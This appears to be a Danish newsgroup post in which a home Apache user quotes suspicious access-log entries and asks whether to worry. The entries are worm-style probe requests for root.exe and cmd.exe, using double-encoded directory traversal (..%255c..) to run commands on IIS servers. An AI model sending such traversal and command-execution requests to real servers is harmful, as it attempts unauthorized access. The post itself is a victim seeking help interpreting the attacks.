Hej,
Jeg er ikke så erfaren i Apache endnu til, at kunne gennemskue dens
logfiler,
så jeg håber, at I kan hjælpe mig.
Jeg har kun én php-fil (icq.php), som kører på min computer. Der er linket
til
den fra min hjemmeside. Alligevel er der nogle (for mig) mystiske ting i
loggen.
Det kan også være, at det er helt almindeligt. De kommer her i forkortet
form:
212.110.138.242 "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
212.110.138.242 "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
212.110.138.242 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
212.110.138.242 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
212.110.138.242 "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 298
212.110.138.242 "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 315
212.88.158.217 "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
212.88.158.217 "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
212.88.158.217 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
212.88.158.217 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
212.88.158.217 "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 298
212.88.158.217 "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 315
[SNIP mange flere]
For mig ser det ud til, at det drejer sig om to forskellige prosoner, der
forsøger at få adgang til administratorstatus og
en kommandoprompt.
212.110.138.242 kommer fra en internet café i Tyskland
212.88.158.217 er fra Crimean Research Education Centre i Ukraine
Det er jo nok svært at gøre noget ved. Skal jeg bare glemme det?
--
Best regards / Mes meilleures amitiés / Med venlig hilsen
Andreas Kryger Jensen
http://www.compose.subnet.dk
OUT &h64, &hfe